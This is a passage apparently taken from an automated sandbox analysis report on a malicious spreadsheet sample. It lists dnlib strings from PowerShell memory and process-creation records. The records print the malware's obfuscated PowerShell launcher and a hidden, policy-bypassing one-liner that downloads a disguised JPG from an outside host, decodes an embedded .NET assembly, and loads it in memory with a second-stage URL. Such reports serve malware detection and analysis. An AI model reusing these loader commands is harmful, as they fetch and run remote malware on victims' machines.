                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: 9EC30000.0.dr Initial sample: OLE indicators vbamacros = False
                Source: RFQ No. 109078906v.xla.xlsx Initial sample: OLE indicators encrypted = True

                Data Obfuscation

                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? 
? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded command string removed]'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CB50
